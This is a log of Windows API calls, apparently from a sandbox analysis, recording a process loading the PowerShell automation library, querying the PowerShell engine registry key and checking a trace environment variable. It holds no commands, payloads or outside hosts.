	[0241.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.205] GetCurrentProcessId () returned 0x4d8
	[0241.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.209] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12db78 | out: phkResult=0x12db78*=0x340) returned 0x0
	[0241.209] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dafc, lpData=0x0, lpcbData=0x12daf8*=0x0 | out: lpType=0x12dafc*=0x1, lpData=0x0, lpcbData=0x12daf8*=0x56) returned 0x0
	[0241.209] CoTaskMemAlloc (cb=0x5a) returned 0x1b8b6c80
	[0241.209] RegQueryValueExW (in: hKey=0x340, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dacc, lpData=0x1b8b6c80, lpcbData=0x12dac8*=0x56 | out: lpType=0x12dacc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dac8*=0x56) returned 0x0
	[0241.209] CoTaskMemFree (pv=0x1b8b6c80) 
	[0241.209] RegCloseKey (hKey=0x340) returned 0x0
	[0241.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.218] CoTaskMemAlloc (cb=0x104) returned 0x221840
	[0241.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x221840, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0241.218] CoTaskMemFree (pv=0x221840) 
	[0241.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.227] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.238] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
